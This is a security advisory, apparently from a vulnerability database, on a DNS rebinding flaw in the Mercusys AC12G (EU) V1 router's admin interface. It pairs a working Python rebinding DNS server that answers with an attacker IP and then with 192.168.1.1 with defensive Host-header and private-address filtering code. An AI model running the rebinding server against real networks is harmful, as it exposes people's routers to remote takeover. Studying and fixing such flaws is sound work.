Mercusys AC12G (EU) V1 DNS Rebinding Vulnerability via Host Header Validation Issue

Vulnerability

A vulnerability in the Mercusys AC12G (EU) V1 router running firmware AC12G(EU)_V1_200909 allows DNS rebinding attacks against the administrative web interface because the HTTP server does not validate the Host header. Three behaviours combine to make this exploitable from the Internet: the router's DNS resolver (Unbound 1.22.0) does not filter private IP addresses out of DNS responses, so an attacker-controlled name can be made to resolve to the router's own LAN address; the HTTP server accepts requests carrying any Host value, including an external domain name, so it serves the rebound requests as if they were legitimate; and the server sets Access-Control-Allow-Origin: * on its responses, so scripts can read what it returns. Together these expose an interface that is meant to be reachable only from the LAN to pages loaded from the Internet.

Impact

This vulnerability enables DNS rebinding attacks against the router's admin interface from the Internet. Once the attacker's domain has been rebound to the router, the attacker's page is already same-origin with the router; the CORS wildcard additionally lets scripts on other origins read sensitive response data from the rebound name. On its own the flaw gives an Internet attacker a channel to the admin interface; when combined with other vulnerabilities in that interface, it could lead to a complete remote compromise of the router.

Reproduction

To reproduce this vulnerability, the attacker registers a domain and runs its authoritative DNS server, configured to answer with a very short TTL. A victim on the router's LAN is lured into visiting that domain; at this point the name resolves to the attacker's public IP address and the attacker's page, including its JavaScript, is loaded into the browser. The attacker then changes the DNS answer for the same name to the router's LAN IP address. Because the router's resolver does not strip private addresses from responses, the victim's browser eventually re-resolves the name to the router, and the JavaScript already running on the page makes requests to it. The router's HTTP server accepts them because it never checks that the Host header (which still carries the attacker's domain) names the router, and the responses can be read by the script. In practice the page keeps polling, since browsers cache the first resolution for a period that does not depend on the TTL (typically on the order of a minute), until its requests start being answered by the router rather than the attacker's server.
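The authoritative-DNS side of the procedure above, as an added example that is not part of the original advisory: a minimal responder that answers A queries for the lure domain with the attacker's public address until the operator calls rebind(), after which it returns the router's LAN address, always with TTL 0. The domain poc.attacker.example, the attacker address 203.0.113.10 (a TEST-NET-3 documentation address) and the router address 192.168.1.1 are assumptions for the demo; answered_ips() is a small response parser included so the behaviour can be checked offline without binding a socket.

```python
"""Minimal authoritative DNS responder for a DNS-rebinding proof of concept.

Added example, not code from the original advisory or the vendor. The attacker's
name server first answers A queries for the lure domain with the attacker's own
public IP (so the victim's browser loads the attacker's page), then, once the
operator calls rebind(), answers the same name with the router's LAN address.
Every answer carries TTL 0 so the browser re-resolves on its next request.
The domain, 203.0.113.10 (TEST-NET-3) and 192.168.1.1 are assumed values.
"""
import socket
import struct

A_RECORD, AAAA_RECORD, CLASS_IN = 1, 28, 1
FLAGS_RESPONSE_NOERROR = 0x8180   # QR, RD, RA, RCODE 0
FLAGS_RESPONSE_NXDOMAIN = 0x8183  # QR, RD, RA, RCODE 3


def encode_name(name: str) -> bytes:
    """Encode a dotted name as DNS labels terminated by a zero-length label."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(msg: bytes, offset: int):
    """Decode a (possibly compressed) name; return (lowercased name, offset after it)."""
    labels, end = [], None
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:  # compression pointer to an earlier name
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            end = end if end is not None else offset + 2
            offset = pointer
            continue
        if length == 0:
            offset += 1
            break
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels).lower(), (offset if end is None else end)


def build_query(name: str, qtype: int = A_RECORD, txid: int = 0x1234) -> bytes:
    """Build a standard query with RD set, as a stub resolver would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def answered_ips(response: bytes):
    """Return [(name, ipv4, ttl)] for the A records in a response's answer section."""
    _, _, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", response[:12])
    offset = 12
    for _ in range(qdcount):           # skip the echoed question(s)
        _, offset = decode_name(response, offset)
        offset += 4
    records = []
    for _ in range(ancount):
        name, offset = decode_name(response, offset)
        rtype, _, ttl, rdlength = struct.unpack("!HHIH", response[offset:offset + 10])
        offset += 10
        rdata, offset = response[offset:offset + rdlength], offset + rdlength
        if rtype == A_RECORD and rdlength == 4:
            records.append((name, socket.inet_ntoa(rdata), ttl))
    return records


class RebindResolver:
    def __init__(self, domain: str, attacker_ip: str, target_ip: str):
        self.domain = domain.lower().rstrip(".")
        self.attacker_ip, self.target_ip = attacker_ip, target_ip
        self.rebound = False

    def rebind(self):
        """Switch the answer to the router's LAN address once the lure page has loaded."""
        self.rebound = True

    def answer(self, query: bytes) -> bytes:
        txid = struct.unpack("!H", query[:2])[0]
        qname, offset = decode_name(query, 12)
        qtype, qclass = struct.unpack("!HH", query[offset:offset + 4])
        question = query[12:offset + 4]
        if qname != self.domain:
            return struct.pack("!HHHHHH", txid, FLAGS_RESPONSE_NXDOMAIN, 1, 0, 0, 0) + question
        if qtype != A_RECORD or qclass != CLASS_IN:
            # NOERROR with no data (e.g. for AAAA) so the browser falls back to the A record.
            return struct.pack("!HHHHHH", txid, FLAGS_RESPONSE_NOERROR, 1, 0, 0, 0) + question
        ip = self.target_ip if self.rebound else self.attacker_ip
        header = struct.pack("!HHHHHH", txid, FLAGS_RESPONSE_NOERROR, 1, 1, 0, 0)
        # Answer name is a pointer (0xC00C) to the question name at offset 12; TTL 0.
        rr = b"\xc0\x0c" + struct.pack("!HHIH", A_RECORD, CLASS_IN, 0, 4) + socket.inet_aton(ip)
        return header + question + rr

    def serve(self, bind_addr=("0.0.0.0", 53)):
        """Serve UDP queries until interrupted (host must be the domain's authoritative NS)."""
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            sock.bind(bind_addr)
            while True:
                data, peer = sock.recvfrom(512)
                sock.sendto(self.answer(data), peer)


if __name__ == "__main__":
    resolver = RebindResolver("poc.attacker.example", "203.0.113.10", "192.168.1.1")
    print(answered_ips(resolver.answer(build_query("poc.attacker.example"))))
    resolver.rebind()
    print(answered_ips(resolver.answer(build_query("poc.attacker.example"))))
```

The second phase only works against this router because its resolver passes the 192.168.1.1 answer through to the client; a resolver that strips private addresses would return an empty or refused answer at the rebind step and the attack would stall there.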

Remediation

The fixes belong in the router firmware, since neither the resolver nor the HTTP server configuration is a user-facing setting: configure the DNS resolver to drop private IP addresses from responses (Unbound's private-address option does this for the ranges listed in it), validate the Host header against the router's own hostname and IP addresses and reject every other value, and remove the Access-Control-Allow-Origin: * header from all responses.
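Two of the three checks above in working form, as an added example that is not the vendor's firmware code: host_header_allowed() is the Host check the router's HTTP server should apply before serving anything (port suffixes, bracketed IPv6 literals and trailing dots are handled so that legitimate requests still pass), and filter_dns_answers() is the private-address filter the resolver should apply, with the network list mirroring the ranges Unbound's private-address option is normally given. The hostname router.local and the addresses 192.168.1.1 and fe80::1 are assumptions for the demo; the third fix, dropping Access-Control-Allow-Origin: *, needs no code beyond not emitting the header.

```python
"""Host-header validation and private-address filtering for a LAN router.

Added example, not the router's firmware or vendor code. host_header_allowed()
is the check the HTTP server should apply to every request; anything that fails
it should get a 400 and never reach the admin handlers. filter_dns_answers()
is the resolver-side fix: answers inside PRIVATE_NETWORKS are removed before
the response reaches the client. router.local, 192.168.1.1 and fe80::1 are
assumed values for the demo.
"""
import ipaddress

# Ranges a LAN router's resolver should never hand back for Internet names.
# Mirrors the ranges Unbound's private-address option is commonly configured with.
PRIVATE_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]


def normalize_host(host_header: str):
    """Return the host part of a Host header, or None if the value is malformed.

    Lowercases, strips an optional :port and a trailing dot, and unwraps a
    bracketed IPv6 literal. Unbracketed IPv6 is rejected because it is not a
    valid Host value and cannot be parsed unambiguously.
    """
    h = host_header.strip().lower()
    if h.startswith("["):                 # IPv6 literal, e.g. [fe80::1]:80
        end = h.find("]")
        if end == -1:
            return None
        port = h[end + 1:]
        if port and not (port.startswith(":") and port[1:].isdigit()):
            return None
        h = h[1:end]
    elif h.count(":") == 1:               # hostname or IPv4 with a port
        h, port = h.split(":")
        if not port.isdigit():
            return None
    elif ":" in h:                        # unbracketed IPv6 or junk
        return None
    h = h.rstrip(".")
    return h or None


def host_header_allowed(host_header: str, router_hostnames, router_ips) -> bool:
    """Accept only the router's own names and addresses; everything else is rejected."""
    host = normalize_host(host_header)
    if host is None:
        return False
    if host in {n.lower().rstrip(".") for n in router_hostnames}:
        return True
    try:
        # Compare as addresses so 'fe80:0:0:0:0:0:0:1' matches 'fe80::1'.
        return ipaddress.ip_address(host) in {ipaddress.ip_address(ip) for ip in router_ips}
    except ValueError:                    # not an IP literal and not a known hostname
        return False


def is_private_address(ip: str) -> bool:
    """True if ip falls in one of PRIVATE_NETWORKS (version mismatches never match)."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in PRIVATE_NETWORKS)


def filter_dns_answers(ips):
    """Drop private, loopback and link-local answers, as the resolver-side fix should."""
    return [ip for ip in ips if not is_private_address(ip)]


if __name__ == "__main__":
    names, ips = ["router.local"], ["192.168.1.1", "fe80::1"]
    for header in ("192.168.1.1:80", "Router.Local.", "[fe80::1]:80", "poc.attacker.example"):
        print(f"Host: {header!r:30} allowed={host_header_allowed(header, names, ips)}")
    print(filter_dns_answers(["203.0.113.10", "192.168.1.1", "10.0.0.5"]))
```

The Host check is deliberately an allow-list: with the rebinding attack the header carries the attacker's domain, which no deny-list of known-bad names would catch, so only values that name the router itself should be served.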

Added: Jun 3, 2026, 6:58 PM
Updated: Jun 3, 2026, 6:58 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 1.7
exploitability: 6.5
remediation: 0.0
relevance: 9.9
threat: 1.6
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.